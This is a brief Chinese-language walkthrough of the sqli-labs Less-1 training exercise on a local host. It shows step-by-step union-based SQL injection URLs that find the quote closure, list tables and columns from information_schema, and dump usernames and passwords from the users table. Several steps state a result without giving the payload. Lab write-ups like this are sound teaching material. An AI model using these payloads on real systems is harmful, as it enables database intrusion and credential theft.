1.判断闭合
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=2--+
2.判断是什么注入类型
id = 2-1;
http://127.0.0.1/sqli-labs-master/Less-1/?id=2-1--+
与id=1;界面不一样
http://127.0.0.1/sqli-labs-master/Less-1/?id=1--+
判断为字符型注入
3.判断字段长度
据此判断得字段长度为3
4.判断回显位置
据此判断得其回显位置为2,3
5.查看其数据库名
6.查看数据库表名
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(0x7e,table_name) from information_schema.tables where table_schema=database()--+
7.查看数据库信息
concat_ws(char(32,58,32),user(),database(),version()),3
8.查询数据库下的表信息
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
9.查询字段下内容
http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(id,username,password) from users --+